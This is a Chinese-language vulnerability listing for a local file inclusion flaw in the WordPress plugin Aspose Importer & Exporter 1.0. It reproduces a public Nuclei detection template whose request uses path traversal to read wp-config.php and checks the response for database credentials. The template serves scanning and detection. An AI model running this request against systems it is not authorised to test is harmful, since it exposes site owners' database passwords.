aspose-ie-file-download: WordPress Aspose Importer & Exporter 1.0 - Local File Inclusion

日期: 2025-08-01 | 影响软件: WordPress Aspose Importer & Exporter 1.0 | POC: 已公开

漏洞描述

WordPress Aspose Importer & Exporter version 1.0 is vulnerable to local file inclusion.

PoC代码[已公开]

id: aspose-ie-file-download

info:
  name: WordPress Aspose Importer & Exporter 1.0 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: WordPress Aspose Importer & Exporter version 1.0 is vulnerable to local file inclusion.
  reference:
    - https://packetstormsecurity.com/files/131162/
    - https://wordpress.org/plugins/aspose-importer-exporter
  metadata:
    max-request: 1
  tags: aspose,packetstorm,wordpress,wp-plugin,lfi,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        part: body
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b20432563ef37f0d4e3e177fe2d802d453dc6da741caa5580c52493c2e8fd59c022100a5f8794b9d2ad22540f0873b397d76c908da17831044c699e5fe0e50a3126492:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/wordpress/aspose-ie-file-download.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐